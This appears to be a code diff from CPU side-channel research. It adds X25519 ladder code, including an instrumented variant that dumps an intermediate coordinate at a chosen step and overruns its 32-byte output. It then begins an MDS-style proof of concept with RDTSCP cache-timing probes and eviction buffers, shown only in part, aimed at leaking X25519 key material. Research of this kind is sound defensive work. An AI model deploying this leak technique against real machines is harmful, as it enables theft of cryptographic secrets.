+  int64_t s7;
+  int64_t s8;
+  int64_t s9;
+  int64_t s10;
+  int64_t s11;
+  int64_t s12;
+  int64_t s13;
+  int64_t s14;
+  int64_t s15;
+  int64_t s16;
+  int64_t s17;
+  int64_t s18;
+  int64_t s19;
+  int64_t s20;
+  int64_t s21;
+  int64_t s22;
+  int64_t s23;
+  int64_t carry0;
+  int64_t carry1;
+  int64_t carry2;
+  int64_t carry3;
+  int64_t carry4;
+  int64_t carry5;
+  int64_t carry6;
+  int64_t carry7;
+  int64_t carry8;
+  int64_t carry9;
+  int64_t carry10;
+  int64_t carry11;
+  int64_t carry12;
+  int64_t carry13;
+  int64_t carry14;
+  int64_t carry15;
+  int64_t carry16;
+  int64_t carry17;
+  int64_t carry18;
+  int64_t carry19;
+  int64_t carry20;
+  int64_t carry21;
+  int64_t carry22;
+  s0 = c0 + a0 * b0;  // limb k of the product: sum of a[i]*b[j] over i+j == k, plus c[k] for k <= 11
+  s1 = c1 + a0 * b1 + a1 * b0;
+  s2 = c2 + a0 * b2 + a1 * b1 + a2 * b0;
+  s3 = c3 + a0 * b3 + a1 * b2 + a2 * b1 + a3 * b0;
+  s4 = c4 + a0 * b4 + a1 * b3 + a2 * b2 + a3 * b1 + a4 * b0;
+  s5 = c5 + a0 * b5 + a1 * b4 + a2 * b3 + a3 * b2 + a4 * b1 + a5 * b0;
+  s6 = c6 + a0 * b6 + a1 * b5 + a2 * b4 + a3 * b3 + a4 * b2 + a5 * b1 + a6 * b0;
+  s7 = c7 + a0 * b7 + a1 * b6 + a2 * b5 + a3 * b4 + a4 * b3 + a5 * b2 +
+       a6 * b1 + a7 * b0;
+  s8 = c8 + a0 * b8 + a1 * b7 + a2 * b6 + a3 * b5 + a4 * b4 + a5 * b3 +
+       a6 * b2 + a7 * b1 + a8 * b0;
+  s9 = c9 + a0 * b9 + a1 * b8 + a2 * b7 + a3 * b6 + a4 * b5 + a5 * b4 +
+       a6 * b3 + a7 * b2 + a8 * b1 + a9 * b0;
+  s10 = c10 + a0 * b10 + a1 * b9 + a2 * b8 + a3 * b7 + a4 * b6 + a5 * b5 +
+        a6 * b4 + a7 * b3 + a8 * b2 + a9 * b1 + a10 * b0;
+  s11 = c11 + a0 * b11 + a1 * b10 + a2 * b9 + a3 * b8 + a4 * b7 + a5 * b6 +
+        a6 * b5 + a7 * b4 + a8 * b3 + a9 * b2 + a10 * b1 + a11 * b0;
+  s12 = a1 * b11 + a2 * b10 + a3 * b9 + a4 * b8 + a5 * b7 + a6 * b6 + a7 * b5 +
+        a8 * b4 + a9 * b3 + a10 * b2 + a11 * b1;
+  s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + a8 * b5 +
+        a9 * b4 + a10 * b3 + a11 * b2;
+  s14 = a3 * b11 + a4 * b10 + a5 * b9 + a6 * b8 + a7 * b7 + a8 * b6 + a9 * b5 +
+        a10 * b4 + a11 * b3;
+  s15 = a4 * b11 + a5 * b10 + a6 * b9 + a7 * b8 + a8 * b7 + a9 * b6 + a10 * b5 +
+        a11 * b4;
+  s16 = a5 * b11 + a6 * b10 + a7 * b9 + a8 * b8 + a9 * b7 + a10 * b6 + a11 * b5;
+  s17 = a6 * b11 + a7 * b10 + a8 * b9 + a9 * b8 + a10 * b7 + a11 * b6;
+  s18 = a7 * b11 + a8 * b10 + a9 * b9 + a10 * b8 + a11 * b7;
+  s19 = a8 * b11 + a9 * b10 + a10 * b9 + a11 * b8;
+  s20 = a9 * b11 + a10 * b10 + a11 * b9;
+  s21 = a10 * b11 + a11 * b10;
+  s22 = a11 * b11;
+  s23 = 0;  // s23 starts empty and only ever receives carry22
+  carry0 = (s0 + (1 << 20)) >> 21;  // rounded carry: add 2^20, shift right by 21; even limbs s0..s22 first
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);  // int64_lshift21 is defined elsewhere; presumably carry << 21 — confirm
+  carry2 = (s2 + (1 << 20)) >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry4 = (s4 + (1 << 20)) >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry12 = (s12 + (1 << 20)) >> 21;
+  s13 += carry12;
+  s12 -= int64_lshift21(carry12);
+  carry14 = (s14 + (1 << 20)) >> 21;
+  s15 += carry14;
+  s14 -= int64_lshift21(carry14);
+  carry16 = (s16 + (1 << 20)) >> 21;
+  s17 += carry16;
+  s16 -= int64_lshift21(carry16);
+  carry18 = (s18 + (1 << 20)) >> 21;
+  s19 += carry18;
+  s18 -= int64_lshift21(carry18);
+  carry20 = (s20 + (1 << 20)) >> 21;
+  s21 += carry20;
+  s20 -= int64_lshift21(carry20);
+  carry22 = (s22 + (1 << 20)) >> 21;
+  s23 += carry22;
+  s22 -= int64_lshift21(carry22);
+  carry1 = (s1 + (1 << 20)) >> 21;  // then the odd limbs s1..s21
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry3 = (s3 + (1 << 20)) >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry5 = (s5 + (1 << 20)) >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  carry13 = (s13 + (1 << 20)) >> 21;
+  s14 += carry13;
+  s13 -= int64_lshift21(carry13);
+  carry15 = (s15 + (1 << 20)) >> 21;
+  s16 += carry15;
+  s15 -= int64_lshift21(carry15);
+  carry17 = (s17 + (1 << 20)) >> 21;
+  s18 += carry17;
+  s17 -= int64_lshift21(carry17);
+  carry19 = (s19 + (1 << 20)) >> 21;
+  s20 += carry19;
+  s19 -= int64_lshift21(carry19);
+  carry21 = (s21 + (1 << 20)) >> 21;
+  s22 += carry21;
+  s21 -= int64_lshift21(carry21);
+  s11 += s23 * 666643;  // from here the fold/carry sequence mirrors the one in x25519_sc_reduce
+  s12 += s23 * 470296;
+  s13 += s23 * 654183;
+  s14 -= s23 * 997805;
+  s15 += s23 * 136657;
+  s16 -= s23 * 683901;
+  s23 = 0;
+  s10 += s22 * 666643;  // fold s22, then s21 down to s18, each into the six limbs starting 12 positions lower
+  s11 += s22 * 470296;
+  s12 += s22 * 654183;
+  s13 -= s22 * 997805;
+  s14 += s22 * 136657;
+  s15 -= s22 * 683901;
+  s22 = 0;
+  s9 += s21 * 666643;
+  s10 += s21 * 470296;
+  s11 += s21 * 654183;
+  s12 -= s21 * 997805;
+  s13 += s21 * 136657;
+  s14 -= s21 * 683901;
+  s21 = 0;
+  s8 += s20 * 666643;
+  s9 += s20 * 470296;
+  s10 += s20 * 654183;
+  s11 -= s20 * 997805;
+  s12 += s20 * 136657;
+  s13 -= s20 * 683901;
+  s20 = 0;
+  s7 += s19 * 666643;
+  s8 += s19 * 470296;
+  s9 += s19 * 654183;
+  s10 -= s19 * 997805;
+  s11 += s19 * 136657;
+  s12 -= s19 * 683901;
+  s19 = 0;
+  s6 += s18 * 666643;
+  s7 += s18 * 470296;
+  s8 += s18 * 654183;
+  s9 -= s18 * 997805;
+  s10 += s18 * 136657;
+  s11 -= s18 * 683901;
+  s18 = 0;
+  carry6 = (s6 + (1 << 20)) >> 21;  // rounded carries over even limbs s6..s16, then odd limbs s7..s15
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry12 = (s12 + (1 << 20)) >> 21;
+  s13 += carry12;
+  s12 -= int64_lshift21(carry12);
+  carry14 = (s14 + (1 << 20)) >> 21;
+  s15 += carry14;
+  s14 -= int64_lshift21(carry14);
+  carry16 = (s16 + (1 << 20)) >> 21;
+  s17 += carry16;
+  s16 -= int64_lshift21(carry16);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  carry13 = (s13 + (1 << 20)) >> 21;
+  s14 += carry13;
+  s13 -= int64_lshift21(carry13);
+  carry15 = (s15 + (1 << 20)) >> 21;
+  s16 += carry15;
+  s15 -= int64_lshift21(carry15);
+  s5 += s17 * 666643;  // second fold pass: s17 down to s12
+  s6 += s17 * 470296;
+  s7 += s17 * 654183;
+  s8 -= s17 * 997805;
+  s9 += s17 * 136657;
+  s10 -= s17 * 683901;
+  s17 = 0;
+  s4 += s16 * 666643;
+  s5 += s16 * 470296;
+  s6 += s16 * 654183;
+  s7 -= s16 * 997805;
+  s8 += s16 * 136657;
+  s9 -= s16 * 683901;
+  s16 = 0;
+  s3 += s15 * 666643;
+  s4 += s15 * 470296;
+  s5 += s15 * 654183;
+  s6 -= s15 * 997805;
+  s7 += s15 * 136657;
+  s8 -= s15 * 683901;
+  s15 = 0;
+  s2 += s14 * 666643;
+  s3 += s14 * 470296;
+  s4 += s14 * 654183;
+  s5 -= s14 * 997805;
+  s6 += s14 * 136657;
+  s7 -= s14 * 683901;
+  s14 = 0;
+  s1 += s13 * 666643;
+  s2 += s13 * 470296;
+  s3 += s13 * 654183;
+  s4 -= s13 * 997805;
+  s5 += s13 * 136657;
+  s6 -= s13 * 683901;
+  s13 = 0;
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = (s0 + (1 << 20)) >> 21;  // rounded carries again: even limbs s0..s10, then odd limbs s1..s11
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry2 = (s2 + (1 << 20)) >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry4 = (s4 + (1 << 20)) >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry1 = (s1 + (1 << 20)) >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry3 = (s3 + (1 << 20)) >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry5 = (s5 + (1 << 20)) >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;  // s12 was zeroed above, so it now holds only carry11; fold it back in
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;  // from here the carries are plain >> 21 (no 2^20 term), rippling s0 up to s11
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry11 = s11 >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;  // fold the carry out of s11 one last time
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;  // final ripple s0..s10; no carry is taken out of s11 this time
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  s[0] = s0 >> 0;  // pack limbs s0..s11 into the 32 output bytes
+  s[1] = s0 >> 8;
+  s[2] = (s0 >> 16) | (s1 << 5);
+  s[3] = s1 >> 3;
+  s[4] = s1 >> 11;
+  s[5] = (s1 >> 19) | (s2 << 2);
+  s[6] = s2 >> 6;
+  s[7] = (s2 >> 14) | (s3 << 7);
+  s[8] = s3 >> 1;
+  s[9] = s3 >> 9;
+  s[10] = (s3 >> 17) | (s4 << 4);
+  s[11] = s4 >> 4;
+  s[12] = s4 >> 12;
+  s[13] = (s4 >> 20) | (s5 << 1);
+  s[14] = s5 >> 7;
+  s[15] = (s5 >> 15) | (s6 << 6);
+  s[16] = s6 >> 2;
+  s[17] = s6 >> 10;
+  s[18] = (s6 >> 18) | (s7 << 3);
+  s[19] = s7 >> 5;
+  s[20] = s7 >> 13;
+  s[21] = s8 >> 0;
+  s[22] = s8 >> 8;
+  s[23] = (s8 >> 16) | (s9 << 5);
+  s[24] = s9 >> 3;
+  s[25] = s9 >> 11;
+  s[26] = (s9 >> 19) | (s10 << 2);
+  s[27] = s10 >> 6;
+  s[28] = (s10 >> 14) | (s11 << 7);
+  s[29] = s11 >> 1;
+  s[30] = s11 >> 9;
+  s[31] = s11 >> 17;
+}
+static void x25519_scalar_mult_generic(uint8_t out[32],  // portable ladder: out = encoded x of e*P, e = clamped scalar
+                                       const uint8_t scalar[32],
+                                       const uint8_t point[32]) {
+  fe x1, x2, z2, x3, z3, tmp0, tmp1;
+  fe_loose x2l, z2l, x3l, tmp0l, tmp1l;
+  uint8_t e[32];
+  OPENSSL_memcpy(e, scalar, 32);  // work on a local copy; the caller's scalar is const
+  e[0] &= 248;  // clear the three lowest bits of the scalar
+  e[31] &= 127;  // clear the top bit of the last byte
+  e[31] |= 64;  // set the second-highest bit of the last byte
+  // The following implementation was transcribed to Coq and proven to
+  // correspond to unary scalar multiplication in affine coordinates given that
+  // x1 != 0 is the x coordinate of some point on the curve. It was also checked
+  // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2
+  // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the
+  // underlying field, so it applies to Curve25519 itself and the quadratic
+  // twist of Curve25519. It was not proven in Coq that prime-field arithmetic
+  // correctly simulates extension-field arithmetic on prime-field values.
+  // The decoding of the byte array representation of e was not considered.
+  // Specification of Montgomery curves in affine coordinates:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Spec/MontgomeryCurve.v#L27>
+  // Proof that these form a group that is isomorphic to a Weierstrass curve:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/AffineProofs.v#L35>
+  // Coq transcription and correctness proof of the loop (where scalarbits=255):
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L118>
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L278>
+  // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0
+  fe_frombytes(&x1, point);  // fe_* helpers are defined elsewhere in this file
+  fe_1(&x2);
+  fe_0(&z2);
+  fe_copy(&x3, &x1);
+  fe_1(&z3);
+  unsigned swap = 0;
+  int pos;
+  for (pos = 254; pos >= 0; --pos) {  // 255 ladder steps, most significant scalar bit first
+    // loop invariant as of right before the test, for the case where x1 != 0:
+    //   pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero
+    //   let r := e >> (pos+1) in the following equalities of projective points:
+    //   to_xz (r*P)     === if swap then (x3, z3) else (x2, z2)
+    //   to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3)
+    //   x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P)
+    unsigned b = 1 & (e[pos / 8] >> (pos & 7));  // b = bit number pos of e
+    swap ^= b;  // swap held the previous bit, so this is 1 only when the bit changed
+    fe_cswap(&x2, &x3, swap);
+    fe_cswap(&z2, &z3, swap);
+    swap = b;  // remember this bit for the next iteration and the final cswap
+    // Coq transcription of ladderstep formula (called from transcribed loop):
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L89>
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L131>
+    // x1 != 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L217>
+    // x1  = 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L147>
+    fe_sub(&tmp0l, &x3, &z3);
+    fe_sub(&tmp1l, &x2, &z2);
+    fe_add(&x2l, &x2, &z2);
+    fe_add(&z2l, &x3, &z3);
+    fe_mul_tll(&z3, &tmp0l, &x2l);
+    fe_mul_tll(&z2, &z2l, &tmp1l);
+    fe_sq_tl(&tmp0, &tmp1l);
+    fe_sq_tl(&tmp1, &x2l);
+    fe_add(&x3l, &z3, &z2);
+    fe_sub(&z2l, &z3, &z2);
+    fe_mul_ttt(&x2, &tmp1, &tmp0);
+    fe_sub(&tmp1l, &tmp1, &tmp0);
+    fe_sq_tl(&z2, &z2l);
+    fe_mul121666(&z3, &tmp1l);
+    fe_sq_tl(&x3, &x3l);
+    fe_add(&tmp0l, &tmp0, &z3);
+    fe_mul_ttt(&z3, &x1, &z2);
+    fe_mul_tll(&z2, &tmp1l, &tmp0l);
+  }
+  // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, z2)
+  fe_cswap(&x2, &x3, swap);
+  fe_cswap(&z2, &z3, swap);
+  fe_invert(&z2, &z2);  // go from projective (x2, z2) to affine: x2 * z2^-1
+  fe_mul_ttt(&x2, &x2, &z2);
+  fe_tobytes(out, &x2);
+}
+static void x25519_scalar_mult(uint8_t out[32], const uint8_t scalar[32],  // dispatcher: NEON routine if usable, else generic
+                               const uint8_t point[32]) {
+#if defined(BORINGSSL_X25519_NEON)  // NEON path is compiled in only when this macro is defined
+  if (CRYPTO_is_NEON_capable()) {  // runtime check, defined elsewhere
+    x25519_NEON(out, scalar, point);
+    return;
+  }
+#endif
+  x25519_scalar_mult_generic(out, scalar, point);  // fallback used in every other case
+}
+void X25519_public_from_private(uint8_t out_public_value[32],  // writes the 32-byte public value for private_key
+                                const uint8_t private_key[32]) {
+#if defined(BORINGSSL_X25519_NEON)
+  if (CRYPTO_is_NEON_capable()) {
+    static const uint8_t kMongomeryBasePoint[32] = {9};  // first byte 9, remaining 31 bytes zero
+    x25519_NEON(out_public_value, private_key, kMongomeryBasePoint);
+    return;
+  }
+#endif
+  uint8_t e[32];
+  OPENSSL_memcpy(e, private_key, 32);  // clamp a local copy; private_key itself is const
+  e[0] &= 248;  // clear the three lowest bits
+  e[31] &= 127;  // clear the top bit of the last byte
+  e[31] |= 64;  // set the second-highest bit of the last byte
+  ge_p3 A;
+  x25519_ge_scalarmult_base(&A, e);  // defined elsewhere; presumably A = e * base point — confirm
+  // We only need the u-coordinate of the curve25519 point. The map is
+  // u=(y+1)/(1-y). Since y=Y/Z, this gives u=(Z+Y)/(Z-Y).
+  fe_loose zplusy, zminusy;
+  fe zminusy_inv;
+  fe_add(&zplusy, &A.Z, &A.Y);
+  fe_sub(&zminusy, &A.Z, &A.Y);
+  fe_loose_invert(&zminusy_inv, &zminusy);
+  fe_mul_tlt(&zminusy_inv, &zplusy, &zminusy_inv);  // despite its name, zminusy_inv now holds (Z+Y)/(Z-Y)
+  fe_tobytes(out_public_value, &zminusy_inv);
+}
+
+void X25519_fake(uint8_t out[32],  // x25519_scalar_mult_generic plus an early exit that dumps z3 at step `iteration`
+                                       const uint8_t scalar[32],
+                                       const uint8_t point[32],
+                                       int iteration) {  // ladder position (254 down to 0) at which to stop; other values never match
+  fe x1, x2, z2, x3, z3, tmp0, tmp1;
+  fe_loose x2l, z2l, x3l, tmp0l, tmp1l;
+  // NOTE(review): the early exit below copies 40 bytes into out although the parameter is declared out[32].
+  uint8_t e[32];
+  OPENSSL_memcpy(e, scalar, 32);  // work on a local copy; the caller's scalar is const
+  e[0] &= 248;  // clear the three lowest bits of the scalar
+  e[31] &= 127;  // clear the top bit of the last byte
+  e[31] |= 64;  // set the second-highest bit of the last byte
+
+  // The following implementation was transcribed to Coq and proven to
+  // correspond to unary scalar multiplication in affine coordinates given that
+  // x1 != 0 is the x coordinate of some point on the curve. It was also checked
+  // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2
+  // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the
+  // underlying field, so it applies to Curve25519 itself and the quadratic
+  // twist of Curve25519. It was not proven in Coq that prime-field arithmetic
+  // correctly simulates extension-field arithmetic on prime-field values.
+  // The decoding of the byte array representation of e was not considered.
+  // Specification of Montgomery curves in affine coordinates:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Spec/MontgomeryCurve.v#L27>
+  // Proof that these form a group that is isomorphic to a Weierstrass curve:
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/AffineProofs.v#L35>
+  // Coq transcription and correctness proof of the loop (where scalarbits=255):
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L118>
+  // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L278>
+  // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0
+  fe_frombytes(&x1, point);
+  fe_1(&x2);
+  fe_0(&z2);
+  fe_copy(&x3, &x1);
+  fe_1(&z3);
+
+  unsigned swap = 0;
+  int pos;
+  for (pos = 254; pos >= 0; --pos) {  // 255 ladder steps, most significant scalar bit first
+    // loop invariant as of right before the test, for the case where x1 != 0:
+    //   pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero
+    //   let r := e >> (pos+1) in the following equalities of projective points:
+    //   to_xz (r*P)     === if swap then (x3, z3) else (x2, z2)
+    //   to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3)
+    //   x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P)
+    unsigned b = 1 & (e[pos / 8] >> (pos & 7));  // b = bit number pos of e
+    swap ^= b;  // swap held the previous bit, so this is 1 only when the bit changed
+    fe_cswap(&x2, &x3, swap);
+    fe_cswap(&z2, &z3, swap);
+    swap = b;
+    // Coq transcription of ladderstep formula (called from transcribed loop):
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZ.v#L89>
+    // <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L131>
+    // x1 != 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L217>
+    // x1  = 0 <https://github.com/mit-plv/fiat-crypto/blob/2456d821825521f7e03e65882cc3521795b0320f/src/Curves/Montgomery/XZProofs.v#L147>
+    fe_sub(&tmp0l, &x3, &z3);
+    fe_sub(&tmp1l, &x2, &z2);
+    fe_add(&x2l, &x2, &z2);
+    fe_add(&z2l, &x3, &z3);
+    fe_mul_tll(&z3, &tmp0l, &x2l);
+    fe_mul_tll(&z2, &z2l, &tmp1l);
+    fe_sq_tl(&tmp0, &tmp1l);
+    fe_sq_tl(&tmp1, &x2l);
+    fe_add(&x3l, &z3, &z2);
+    fe_sub(&z2l, &z3, &z2);
+    fe_mul_ttt(&x2, &tmp1, &tmp0);
+    fe_sub(&tmp1l, &tmp1, &tmp0);
+    fe_sq_tl(&z2, &z2l);
+    fe_mul121666(&z3, &tmp1l);
+    fe_sq_tl(&x3, &x3l);
+    fe_add(&tmp0l, &tmp0, &z3);
+    fe_mul_ttt(&z3, &x1, &z2);
+  if (pos == iteration) {  // early exit taken after z3 is final for this step, before the last z2 multiply
+      memcpy(out, &z3, 40);  // raw bytes of z3, not fe_tobytes output; 40 is presumably sizeof(fe) — confirm caller's buffer
+      return;
+  }
+    fe_mul_tll(&z2, &tmp1l, &tmp0l);
+  }
+  // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, z2)
+  fe_cswap(&x2, &x3, swap);
+  fe_cswap(&z2, &z3, swap);
+  // Reached only when iteration never matched a ladder position: finish as the regular function does.
+  fe_invert(&z2, &z2);
+  fe_mul_ttt(&x2, &x2, &z2);
+  fe_tobytes(out, &x2);
+}
diff --git a/pocs/cpus/mds-x25519/leak_evict_x25519.c b/pocs/cpus/mds-x25519/leak_evict_x25519.c
new file mode 100644
index 00000000..414aba5e
--- /dev/null
+++ b/pocs/cpus/mds-x25519/leak_evict_x25519.c
@@ -0,0 +1,464 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <memory.h>
+#include <sys/mman.h>
+#include <immintrin.h>
+#include <err.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <syscall.h>
+#include <linux/mman.h>
+
+
+
+#define MEMSZ (256*512 * 100)
+
+#ifndef EVICT
+#define EVICT 24
+#endif
+
+#define CACHE_MISS 150
+
+// Times a single load from ptr1 and classifies it as a cache hit or miss.
+//
+// The inline assembly is Intel syntax (the Makefile builds with
+// -masm=intel). It takes a timestamp, performs the load, takes a second
+// timestamp and stores the low 32 bits of the difference in `diff`.
+//
+// Returns 1 when the measured delta is below CACHE_MISS, 0 otherwise.
+static inline __attribute__((always_inline)) int is_cached(void *ptr1) {
+  uint32_t diff;
+  asm volatile (
+      //"CPUID\n\t"
+      "mfence\n\t"
+      "RDTSCP\n\t"            // first timestamp (left in rax)
+      "mov rdx, [%1]\n\t"     // the load being timed
+      "mov rbx, rax\n\t"      // save first timestamp; ptr1 in rbx is no longer needed
+      "RDTSCP\n\t"            // second timestamp
+      "sub rax, rbx\n\t"
+      "mov %0, eax\n\t"
+      //"mfence\n\t"
+
+      // Both the result and the pointer are pinned to rbx/ebx.
+      : "=b" (diff)
+      : "b"(ptr1)
+      : "rax", "rcx", "rdx");
+
+  return diff < CACHE_MISS;
+}
+
+const unsigned long probe1_addr = 0x780000000;
+char *probe1 = (char*) probe1_addr;
+const unsigned long probe3_addr = 0x560000000;
+char *probe3 = (char*) probe3_addr;
+const unsigned long evict_addr = 0x340000000;
+char *evict = (char*) evict_addr;
+
+
+// Offset up to 4096 - be aware of boundaries on cache lines though!
+// Performs one transactional probe and reports whether probe1 got cached.
+//
+// off:    offset to sample; only (off & 0x3f) is applied to probe3 for the
+//         load, and (off & 4095) selects the byte touched in each eviction
+//         page. Offsets whose low 6 bits exceed 0x38 abort the program.
+// prefix: value XORed into the loaded qword.
+// mask:   bits of the XOR result that are kept.
